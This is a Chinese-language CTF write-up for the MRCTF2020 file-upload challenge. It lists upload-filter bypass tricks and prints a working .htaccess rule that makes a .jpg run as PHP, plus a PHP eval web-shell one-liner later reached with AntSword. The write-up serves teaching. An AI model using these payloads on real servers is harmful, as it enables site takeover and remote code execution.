[MRCTF2020]你传你码呢

1.是兄弟就来传马

题目提示很明显,就是让我们上传木马。
文件上传的基本思路有下面这些方面。

1、前端绕过,抓包修改后缀名,
2、文件内容绕过,用图片马,抓包修改后缀绕过
3、黑名单绕过,那么我们可以改成phtml抓包绕过
4、.htaccess绕过,只要有这个配置文件,并且内容为“AddType application/x-httpd-php .jpg(就是把所以jpg后缀的文件全都当作php文件来执行)”
5、大小写绕过,抓包后修改后缀为.PHp
6、空格绕过,抓包修改后缀,在后缀后面加上空格
7、点绕过,抓包修改后缀,在后缀后面加上点(删掉空格还可以. .或者 . )
8、文件流绕过,前提条件,必须是window的服务器,抓包修改后缀,并在后缀后面加上::$DATA,
9、双拼绕过,抓包修改后缀,并在把后缀改成pphphp,这样后端去掉php,还剩下个p和hp组合在一起,又是php
10、.user.ini配置文件绕过

2…htaccess文件解析漏洞

经过抓包修改后缀名,修改mime类型,后缀别名之类的修改,发现都被ban了。
在这里插入图片描述
最后尝试了一下修改htaccess配置文件发现上传成功了。
.htaccess文件解析漏洞.htaccess文件解析漏洞

通过修改apache的.htaccess配置文件可以将其他类型的文件当作php文件来解析。

上传.htaccess文件文件如下

<FilesMatch "1.jpg">//修改的文件,弱改为.jpg则会吧所有.jpg文件当作php文件解析。
SetHandler application/x-httpd-php
</FilesMatch>

在这里插入图片描述
上传时要记得抓包修改一下mime类型绕过mime类型的过滤。
在这里插入图片描述
上传成功,接下来上传我们的图片一句话。

<script language='php'>eval($_REQUEST['a']);</script>

在这里插入图片描述
上传成功,访问。
在这里插入图片描述
一片空白,可以看到我们的1.jpg被当作php解析了。
蚁剑连接。
在这里插入图片描述
成功拿到flag。

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值